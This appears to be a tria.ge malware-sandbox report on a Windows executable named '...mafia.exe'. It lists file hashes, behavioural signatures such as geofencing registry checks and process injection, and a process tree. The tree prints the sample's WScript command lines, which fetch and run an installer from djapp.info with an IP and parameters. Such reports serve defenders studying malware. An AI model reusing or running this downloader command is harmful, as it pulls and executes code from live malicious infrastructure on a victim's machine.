Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
06/09/2024, 15:37
Static task
static1
Behavioral task
behavioral1
Sample
20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe
Resource
win7-20240708-en
General
-
Target
20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe
-
Size
184KB
-
MD5
ce50ed54a539f85a378626c786c8a5fd
-
SHA1
b0ac55b2a82533238a96233db46692490f763b65
-
SHA256
163c5db8ff5d6da725486749841705e441d967fcda70f3a03301f26052b0863a
-
SHA512
727fd07e6256c2d96760bb0b4f724794b3a530a163dcb2ea8cf5908f550a46b0860c33a2b8ccf0009daa7611059ff49eea3453625fe5b2954125a5d2fa075f8f
-
SSDEEP
3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3p:/7BSH8zUB+nGESaaRvoB7FJNndnY
Malware Config
Signatures
-
Blocklisted process makes network request 6 IoCs
flow pid Process 8 2312 WScript.exe 16 3216 WScript.exe 26 3044 WScript.exe 44 4772 WScript.exe 45 4772 WScript.exe 53 1156 WScript.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation 20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings 20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 4460 wrote to memory of 2312 4460 20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe 86 PID 4460 wrote to memory of 2312 4460 20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe 86 PID 4460 wrote to memory of 2312 4460 20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe 86 PID 4460 wrote to memory of 3216 4460 20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe 87 PID 4460 wrote to memory of 3216 4460 20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe 87 PID 4460 wrote to memory of 3216 4460 20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe 87 PID 4460 wrote to memory of 3044 4460 20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe 92 PID 4460 wrote to memory of 3044 4460 20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe 92 PID 4460 wrote to memory of 3044 4460 20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe 92 PID 4460 wrote to memory of 4772 4460 20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe 98 PID 4460 wrote to memory of 4772 4460 20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe 98 PID 4460 wrote to memory of 4772 4460 20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe 98 PID 4460 wrote to memory of 1156 4460 20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe 99 PID 4460 wrote to memory of 1156 4460 20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe 99 PID 4460 wrote to memory of 1156 4460 20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe"C:\Users\Admin\AppData\Local\Temp\20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf96F0.js" http://www.djapp.info/?domain=fGCKQnUEDz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf96F0.exe2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:2312
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf96F0.js" http://www.djapp.info/?domain=fGCKQnUEDz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf96F0.exe2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:3216
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf96F0.js" http://www.djapp.info/?domain=fGCKQnUEDz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf96F0.exe2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:3044
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf96F0.js" http://www.djapp.info/?domain=fGCKQnUEDz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf96F0.exe2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:4772
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf96F0.js" http://www.djapp.info/?domain=fGCKQnUEDz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf96F0.exe2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:1156
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53813cab188d1de6f92f8b82c2059991b
SHA14807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA51283b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76